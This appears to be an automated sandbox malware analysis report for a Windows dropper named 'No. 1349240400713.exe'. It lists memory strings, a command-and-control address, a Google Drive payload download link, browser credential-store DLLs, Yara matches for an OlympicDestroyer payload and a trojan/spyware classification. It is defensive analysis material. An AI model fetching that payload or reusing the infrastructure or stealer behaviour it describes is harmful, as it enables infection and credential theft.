                  Source: No. 1349240400713.exe, 00000009.00000003.1863707433.000000000693C000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1859976358.000000000693C000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1863957270.000000000693C000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1864082338.000000000693C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://89.40.31.232/12/index.phpw
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                  Source: No. 1349240400713.exe, 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmp, No. 1349240400713.exe, 00000000.00000000.1245208381.000000000040A000.00000008.00000001.01000000.00000003.sdmp, No. 1349240400713.exe, 00000009.00000002.1881204163.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.com0
                  Source: No. 1349240400713.exe, 00000009.00000003.1864703966.00000000069A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: No. 1349240400713.exe, 00000009.00000003.1766015185.000000000697C000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1765973967.0000000006942000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
                  Source: No. 1349240400713.exe, 00000009.00000003.1864703966.00000000069A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: No. 1349240400713.exe, 00000009.00000003.1864703966.00000000069A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: No. 1349240400713.exe, 00000009.00000003.1864703966.00000000069A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: No. 1349240400713.exe, 00000009.00000002.1886652330.00000000068C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
                  Source: No. 1349240400713.exe, 00000009.00000002.1886652330.00000000068C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/sv
                  Source: No. 1349240400713.exe, 00000009.00000002.1886652330.000000000690F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?expo
                  Source: No. 1349240400713.exe, 00000009.00000002.1886652330.00000000068C8000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000002.1886652330.0000000006905000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000002.1887115935.00000000083D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1MH4PBcg5lUR7-iNRXL3tEF69vWwWBAnh
                  Source: No. 1349240400713.exe, 00000009.00000002.1886652330.00000000068C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1MH4PBcg5lUR7-iNRXL3tEF69vWwWBAnh3
                  Source: No. 1349240400713.exe, 00000009.00000002.1886652330.0000000006905000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1MH4PBcg5lUR7-iNRXL3tEF69vWwWBAnhzx
                  Source: No. 1349240400713.exe, 00000009.00000003.1863707433.000000000693C000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1859976358.000000000693C000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1863957270.000000000693C000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000002.1886652330.000000000692D000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1864082338.000000000693C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
                  Source: No. 1349240400713.exe, 00000009.00000002.1886652330.000000000692B000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1766015185.000000000697C000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1765973967.0000000006942000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000002.1886652330.000000000690F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1MH4PBcg5lUR7-iNRXL3tEF69vWwWBAnh&export=download
                  Source: No. 1349240400713.exe, 00000009.00000002.1886652330.0000000006921000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1MH4PBcg5lUR7-iNRXL3tEF69vWwWBAnh&export=download4
                  Source: No. 1349240400713.exe, 00000009.00000003.1864703966.00000000069A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: No. 1349240400713.exe, 00000009.00000003.1864703966.00000000069A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: No. 1349240400713.exe, 00000009.00000003.1864703966.00000000069A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: No. 1349240400713.exe, 00000009.00000002.1886652330.000000000692D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.c
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1880512323.00000000378C8000.00000004.00001000.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1880569360.00000000378D0000.00000004.00001000.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1880531746.00000000378CC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf
                  Source: No. 1349240400713.exe, 00000009.00000002.1886652330.000000000692D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1880512323.00000000378C8000.00000004.00001000.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1880569360.00000000378D0000.00000004.00001000.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1880531746.00000000378CC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf
                  Source: No. 1349240400713.exe, 00000009.00000002.1886652330.000000000692D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                  Source: No. 1349240400713.exe, 00000009.00000002.1886652330.0000000006921000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033w0
                  Source: No. 1349240400713.exe, 00000009.00000003.1880608667.0000000037044000.00000004.00001000.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1880111488.0000000036C00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf
                  Source: No. 1349240400713.exe, 00000009.00000002.1886652330.000000000692D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                  Source: No. 1349240400713.exe, 00000009.00000003.1766015185.000000000697C000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1765973967.0000000006942000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                  Source: No. 1349240400713.exe, 00000009.00000003.1864703966.00000000069A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: No. 1349240400713.exe, 00000009.00000003.1766015185.000000000697C000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1765973967.0000000006942000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
                  Source: No. 1349240400713.exe, 00000009.00000003.1766015185.000000000697C000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1765973967.0000000006942000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                  Source: No. 1349240400713.exe, 00000009.00000003.1864703966.00000000069A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: No. 1349240400713.exe, 00000009.00000003.1766015185.000000000697C000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1765973967.0000000006942000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
                  Source: No. 1349240400713.exe, 00000009.00000003.1766015185.000000000697C000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1765973967.0000000006942000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
                  Source: unknownHTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.7:49905 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.7:49911 version: TLS 1.2
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeCode function: 0_2_004055B8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004055B8

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 9.3.No. 1349240400713.exe.374ad227.1.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
                  Source: 9.3.No. 1349240400713.exe.374a8abf.2.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
                  Source: 9.3.No. 1349240400713.exe.374a4355.3.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeCode function: 0_2_004034C5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034C5
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeCode function: 9_2_004034C5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,9_2_004034C5
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Windows\resources\0809Jump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Windows\resources\0809\EpisyllogismJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Windows\resources\0809\Episyllogism\medJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeCode function: 0_2_004074580_2_00407458
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeCode function: 0_2_00406C810_2_00406C81
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeCode function: 0_2_6EDF1B5F0_2_6EDF1B5F
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeCode function: 9_2_004074589_2_00407458
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeCode function: 9_2_00406C819_2_00406C81
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeCode function: String function: 00402D3E appears 51 times
                  Source: api-ms-win-core-synch-l1-2-0.dll.9.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-conio-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-heap-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-sysinfo-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-handle-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-debug-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-multibyte-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-utility-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-environment-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-time-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-filesystem-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-datetime-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-heap-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-processthreads-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-file-l2-1-0.dll.9.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-string-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-console-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-file-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-runtime-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-libraryloader-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-profile-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-locale-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-process-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-localization-l1-2-0.dll.9.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-file-l1-2-0.dll.9.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-interlocked-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-processthreads-l1-1-1.dll.9.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-private-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-stdio-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-namedpipe-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-convert-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-errorhandling-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-math-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-memory-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-processenvironment-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-string-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-util-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-synch-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-timezone-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-rtlsupport-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs No. 1349240400713.exe
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreebl3.dll0 vs No. 1349240400713.exe
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs No. 1349240400713.exe
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs No. 1349240400713.exe
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs No. 1349240400713.exe
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenssdbm3.dll0 vs No. 1349240400713.exe
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll0 vs No. 1349240400713.exe
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs No. 1349240400713.exe
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dll^ vs No. 1349240400713.exe
                  Source: No. 1349240400713.exe, 00000009.00000003.1879220439.00000000378F0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs No. 1349240400713.exe
                  Source: No. 1349240400713.exe, 00000009.00000003.1880472952.0000000037D14000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs No. 1349240400713.exe
                  Source: No. 1349240400713.exe, 00000009.00000003.1880059026.0000000037488000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs No. 1349240400713.exe
                  Source: No. 1349240400713.exe, 00000009.00000003.1880017638.000000003748C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs No. 1349240400713.exe
                  Source: No. 1349240400713.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: 9.3.No. 1349240400713.exe.374ad227.1.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
                  Source: 9.3.No. 1349240400713.exe.374a8abf.2.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
                  Source: 9.3.No. 1349240400713.exe.374a4355.3.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
                  Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@3/60@2/3
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeCode function: 0_2_004034C5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034C5
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeCode function: 9_2_004034C5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,9_2_004034C5
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeCode function: 0_2_00404858 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404858
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeCode function: 0_2_004021A2 CoCreateInstance,0_2_004021A2
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user\udstrmningsdysernesJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeMutant created: \Sessions\1\BaseNamedObjects\AFA7A44E-69414907-A77BDA8E-283FE413-39C8164A8
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsj4AB1.tmpJump to behavior
                  Source: No. 1349240400713.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT ALL id FROM %s;
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
